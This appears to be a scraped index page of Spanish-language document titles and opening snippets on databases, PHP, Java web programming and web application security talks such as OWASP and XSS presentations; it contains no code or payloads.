ÍNDICE Introducción... XI Capítulo 1. Características, instalación, inicio y entorno de trabajo... 1 Características y novedades de Access 2010... 1 Comienzo rápido del trabajo y seguimiento de la información...
Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web
Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay [email protected] Introducción El problema
DECÁLOGO DE SEGURIDAD
DECÁLOGO DE SEGURIDAD para acceder a la banca por internet Bankinter, S.A. Todos los derechos reservados. marzo 2005 La banca por Internet es desde hace años una realidad, cada día más personas la utilizan
Programador Web en Drupal + PHP + Javascripts + MySQL. Nivel Profesional. Informática y Programación
Programador Web en Drupal + PHP + Javascripts + MySQL. Nivel Profesional Informática y Programación Ficha Técnica Categoría Informática y Programación Referencia 30302-1402 Precio 119.00 Euros Sinopsis
APLICACIONES MÓVILES NATIVAS. Sesión 8: Arquitectura de las aplicaciones Android
APLICACIONES MÓVILES NATIVAS Sesión 8: Arquitectura de las aplicaciones Android Contextualización Los lenguajes de programación que utilizan android y Java como base de desarrollo, han complementado la
Transferencia documentos Actas - Extranet
Transferencia documentos Actas - Extranet Manual de usuario 29 de octubre de 2012 Superintendencia de Bancos e Instituciones Financieras Contenido 1 Introducción.... 3 2 Cómo funciona Extranet... 3 2.1
MANUAL BÁSICO DE MYSQL
MANUAL BÁSICO DE MYSQL ESCUELA COLOMBIANA DE INGENIERÍA JULIO GARAVITO LABORATORIO DE INFORMÁTICA BOGOTÁ D. C. 2007-2 TABLA DE CONTENIDO MANUAL BÁSICO DE MYSQL... 1 INTRODUCCIÓN... 3 1. CONECTARSE CON
SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: [email protected] Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
ID-UAM: GESTIÓN DE CUENTAS
ID-UAM: GESTIÓN DE CUENTAS BIENVENIDO A ID-UAM: GESTIÓN DE CUENTAS PRIMER ACCESO AL SERVICIOS ACCESO CON PREGUNTAS PERSONALES POR OLVIDO PETICIÓN DE CÓDIGO DE ACTIVACIÓN ACCESO MEDIANTE CÓDIGO DE ACTIVACIÓN
Principios Básicos de Seguridad en Bases de Datos
Publicado en Revista.Seguridad (http://revista.seguridad.unam.mx) Inicio > Principios Básicos de Seguridad en Bases de Datos Principios Básicos de Seguridad en Bases de Datos Por Johnny Villalobos Murillo
Ataques más comunes. Virginia Armas Alejandro Do Nascimiento
Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1 Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion
Java Servlets. Luis Fernando Llana Díaz. 17 de abril de 2006. Departamento de Sistemas Informáticos y ProgramaciónUniversidad Complutense de Madrid
Departamento de Sistemas Informáticos y Programación Universidad Complutense de Madrid de abril de 00 input, output En pascal input, output program holamundo (input, output); var nombre : String; begin
Gastón Toth [email protected]. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia
Gastón Toth [email protected] Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing
Navegadores. Los navegadores. Privacidad. Oscar Herrero INTERNET SEGURO CEIP ARCIPRESTE DE HITA. Fuente:OSI
Navegadores Para la mayoría de usuarios, la cara visible de la informática es Internet. Desde todo tipo de dispositivos (ordenadores, tabletas y smartphones) accedemos a la red en busca de información,
Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es [email protected]
Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es [email protected] # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,
Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals
Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano [email protected] Seguridad en PHP Lineamientos
WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting
ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González [email protected] WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es
MySQL por línea de comandos
MySQL por línea de comandos Acceso a un servidor MySQL y administración de la base de datos por línea de comandos. Es muy normal que utilicemos MySQL a través de páginas PHP y para administrar la base
A1-Inyección (SQL,OS Y LDPA)
Los Diez Riesgos Más Importantes en Aplicaciones WEB Top 10-2010 A1-Inyección (SQL,OS Y LDPA) Oscar William Monsalve Luis Alberto Suarez Jorge Eliecer Betancur Diana Marcela Usuga G. Contenido Presentación
Programación con JDBC (Java DataBase Connectivity ), Servlets y JSP (Java Server Pages)
Programación con JDBC (Java DataBase Connectivity ), Servlets y JSP (Java Server Pages) Autor: José Vicente Núñez Zuleta ([email protected], [email protected]) Puntos a tratar Qué es JDBC? Arquitectura de un
LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org
LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo
Estructura del Sistema
Estructura del Sistema Actualización del Sistema GitHUB Cómo se puede saber la versión instalada Menú del administrador v0.15.05 15 año 2015 05 semana Instalación Requerimientos Acceso a Internet Dominio
Programación páginas web. Servidor (PHP)
Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.
Seguridad WEB Inyección de código
Seguridad WEB Inyección de código Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo ([email protected]) NIDTEC - Núcleo de Investigación
PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1
Introducción (1) Personal Home Page Qué es? Acrónimo de : Hypertext Preprocessor. Lenguaje interpretado de alto nivel que permite desarrollar fácilmente páginas dinámicas. Similar a los lenguajes C y Perl.
Iniciando con Oracle. Índice de contenido. Ingresando a Oracle. Cambiando Su Contraseña. Ingresando un Comando SQL en SQL*Plus
Iniciando con Oracle Índice de contenido Ingresando a Oracle...1 Cambiando Su Contraseña...1 Ingresando un Comando SQL en SQL*Plus...2 Saliendo de SQL*Plus...2 Consiguiendo Ayuda...2 Creación de una Tabla...3
Formularios HTML. Desarrollo de Aplicaciones Web Departamento Informática y Sistemas Universidad de Murcia Curso 2013/2014
Formularios HTML Desarrollo de Aplicaciones Web Departamento Informática y Sistemas Universidad de Murcia Curso 2013/2014 Declaración de un formulario Elemento clave para el desarrollo de aplicaciones
USANDO SERVLETS EN UN SERVIDOR WEB RESIN
USANDO SERVLETS EN UN SERVIDOR WEB RESIN Servidor Web Resin Resin es un servidor web que permite no solo despachar un página web, sino aplicaciones web construidos bajo la arquitectura J2EE, así como el
Guía Taller I Conexión con la Base de Datos Introducción a PostgreSQL
Guía Taller I Conexión con la Base de Datos Introducción a PostgreSQL 1. Conexión con la Base de Datos: se debe realizar a partir de algún programa que implemente el protocolo SSH (Secure Shell), a partir
XPERTO EN DISEÑO DE PÁGINAS WEB
Curso ICA de: EXPERTO EN DISEÑO DE PÁGINAS WEB Módulo 1: Program. cliente: JavaScript Estudia el lenguaje JavaScript para crear guiones o scripts que se incluyen en las páginas web y que son ejecutados
Mario Muñoz Organero & Norberto Fernández * Departamento de Ingeniería Telemática http://www.it.uc3m.es/mario http://www.it.uc3m.
JSP (I) Mario Muñoz Organero & Norberto Fernández * Departamento de Ingeniería Telemática http://www.it.uc3m.es/mario http://www.it.uc3m.es/berto (*) Agradecimientos a Lourdes Tajes en cuyo material docente
MAESTRO DE PHP PHP NIVEL 1
MAESTRO DE PHP MAESTRO DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks. Incluye los Cursos PHP Nivel 1 y PHP Avanzado
ISJu: Técnicas de Programación Cartilla Teórica-Práctica 2014. Instalación del "Eclipse IDE for Java EE Developers" y el servidor "Apache Tomcat"
Unidad 6: Servlets Instalación del "Eclipse IDE for Java EE Developers" y el servidor "Apache Tomcat" "Eclipse IDE for Java EE Developers" Para desarrollar aplicaciones que se ejecuten en un servidor web
Práctica sobre compartición de instancias remotas.
Práctica sobre compartición de instancias remotas. Para esta práctica se ha construido un pequeño sistema cliente-servidor que permite la resolución de Sudokus entre varios jugadores. El servidor consta
Dreamweaver CS 5. 1 Conociendo Adobe Dreamweaver CS Introducción a Adobe Dreamweaver. 1.2 Novedades de Dreamweaver CS5
Dreamweaver CS 5 1 Conociendo Adobe Dreamweaver CS5 1.1 Introducción a Adobe Dreamweaver 1.2 Novedades de Dreamweaver CS5 1.3 Requerimientos técnicos 1.4 Editar páginas Web 1.5 Cómo tener una página en
El desafío del acceso remoto al Sistema de Información desde Internet
El desafío del acceso remoto al Sistema de Información desde Internet VI Jornadas Universitarias de Sistemas de Información en Salud Lic. Fernando Campos Jefe del Área Ingeniería de Software Departamento
ZEND FRAMEWORK Desarrollo de Aplicaciones Seguras
ZEND FRAMEWORK Desarrollo de Aplicaciones Seguras Karén Nalbandian [email protected] Versión en español del Webinar realizado por Stefan Esser de SectionEins GmbH Acerca de mi Project Manager, Líder
GUÍA DE TRABAJO GRADO 11. Articulación SENA Programación de Software Ing. Néstor Raúl Suarez Perpiñan Página 1 de 6
Página 1 de 6 Tema: PROCEDIMIENTOS ALMACENADOS SQL SERVER Objetivo: Adquirir los conocimientos necesarios para desarrollar e implementar procedimientos almacenados utilizando SQL Server y lenguaje C# I.
Sistemas de Información 12/13 Servlets y JSPs (Java Server Pages)
12/13 Servlets y JSPs (Java Server Pages) Departamento Informática e Ingeniería de Sistemas Universidad de Zaragoza ([email protected]) " Guión Introducción Servlets Introducción Clases e interfaces del
RETO HACKER DE VERANO
RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque
Como usar Zend_Auth del Zend Framework
Como usar Zend_Auth del Zend Framework Elaborado por Rob Allen, www.akrabat.com Revision 1.0.4 Copyright 2007 Traducido por Claudio Cossio, www.ajaxcode.net El propósito de este tutorial es dar una introducción
PRACTICA FINAL. Diseño e implementación de un servidor Web básico y cliente http. Protocolo HTTP-RC
PRACTICA FINAL Diseño e implementación de un servidor Web básico y cliente http Descripción de la práctica Protocolo HTTP-RC Se pretende desarrollar un servidor Web básico con soporte a múltiples conexiones
UD 4: Instalación y administración de servicios Web SRI
Instalación y administración de servicios Web SRI RESULTADOS DE APRENDIZAJE Administra servidores Web aplicando criterios de configuración y asegurando el funcionamiento del servicio. Introducción - WWW
GALA CONCEPTO COMMIT, ROOLBACK SAVEPOINTS (SAVE TRANSACTION) No Consultas. Definiciones Transacciones ( L33 )
Definiciones Transacciones ( L33 ) CONCEPTO COMMIT, ROOLBACK SAVEPOINTS (SAVE TRANSACTION) Transacciones En Microsoft ( L33 ) MANUAL (REQUIERE PROGRAMACION) AUTOMATICO (COM+ O DTM) DTM (DISTRIBUTED TRANSACTION
PHP Hypertext PreProcessor
PHP PHP Hypertext PreProcessor 1 PHP 10. Cookies 11. Sesiones 12. Formas 13.Acceso a base de datos 2 Cookies Son pequeños archivos de texto que el servidor almacena en el cliente. Se envían como parte
PÁGINAS DINÁMICAS WEB CON PHP. Unidad 4 Aplicaciones Web
PÁGINAS DINÁMICAS WEB CON PHP Unidad 4 Aplicaciones Web Agenda del curso PHP 2009 DIA 5 (2 horas) (2 horas) Aplicaciones web Variables predefinidas en PHP Uso de formularios en PHP (2 horas) Administración
EXTENSIÓN DE UML PARA APLICACIONES WEB
EXTENSIÓN DE UML PARA APLICACIONES WEB 1. Descripción Esta extensión de UML define un conjunto de estereotipos, valores etiquetados y restricciones que nos permiten modelar aplicaciones web. Los estereotipos
Unidad Didáctica 2. Elementos básicos del lenguaje Java Tipos, declaraciones, expresiones y asignaciones
Unidad Didáctica 2 Elementos básicos del lenguaje Java Tipos, declaraciones, expresiones y asignaciones Fundamentos de Programación Departamento de Lenguajes y Sistemas Informáticos Versión 1.0.3 Índice
Data Bases 2. La sintaxis precisa de esta función es: mysql_pconnect (nombre del servidor, el usuario de la base de datos, password ) ;
Data Bases 2 Este capítulo aprenderemos como crear ya una página de internet en la cual tendrá interacción con el usuario, como llenaremos un formulario HTML y que directamente se registre en la Base de
